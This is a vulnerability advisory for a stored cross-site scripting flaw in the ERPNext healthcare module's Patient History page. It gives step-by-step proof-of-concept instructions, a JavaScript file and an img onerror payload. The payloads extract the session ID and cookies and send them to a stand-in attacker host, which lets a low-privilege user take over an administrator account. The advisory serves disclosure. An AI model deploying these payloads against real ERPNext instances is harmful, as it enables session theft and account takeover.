CVE-2022-23056

Overview

In ERPNext, versions v13.0.0-beta.13 through v13.30.0 are vulnerable to Stored XSS at the Patient History page which allows a low privilege user to conduct an account takeover attack.

Details

ERPNext versions v13.0.0-beta.13 through v13.30.0 are vulnerable to stored xss which can lead to account take over.

PoC Details

1. Login into application with low privilege user (like physician)
2. Navigate to the healthcare module and click on 'patients' in 'masters'.
3. Click on ‘new’ to create a new patient entry and fill in the details.
4. Create a file named “test.js” to steal the cookie from the victim.

var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;

var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(':');
getSID = getSID[1].match(te);
url = 'http://attacker-ip:attacker-port/?sid='+getSID;
var script = document.createElement('script');
script.src = url+"&details= " + document.cookie;
document.getElementsByTagName('head')[0].appendChild(script);

5. Type the malicious payload script in the 'surgical history' field and then click 'save'. (the payload can be found in the ‘Poc Code’).
6.Run an HTTP server (like simple HTTP server) to host the malicious file.
7. Open a new tab, and login to the application as an ‘administrator’ and navigate to ‘patient history’ in ‘records and history’ from the ‘healthcare’ area.
8. Search for the specific patient you created earlier and then the patient history will be loaded to the page. Finally, the malicious script in the parameter ‘surgical history’ will be executed.

PoC Code

<img src=x onerror=this.src='http://attacker-ip:attacker-port/?c='+(((document.documentElement.innerHTML).match(/\"sid\":\s\"[0-9a-zA-Z]+\"/gm))[0].split(':')[1]).substring(2,58) >

Affected Environments

ERPNext versions v13.0.0-beta.13 through v13.30.0

Prevention

No fix version has released yet